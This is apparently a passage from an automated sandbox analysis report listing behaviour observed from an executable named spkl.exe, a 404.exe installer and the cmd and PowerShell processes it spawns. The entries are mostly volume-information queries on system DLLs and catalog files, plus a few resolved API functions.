Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	51_2_033A4CB8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	51_2_033A4D8A
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetLocaleInfoA,	51_2_033A9C9C

Source: C:\Users\user\Desktop\404.exe	Queries volume information: C:\Users\user\Desktop\404.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
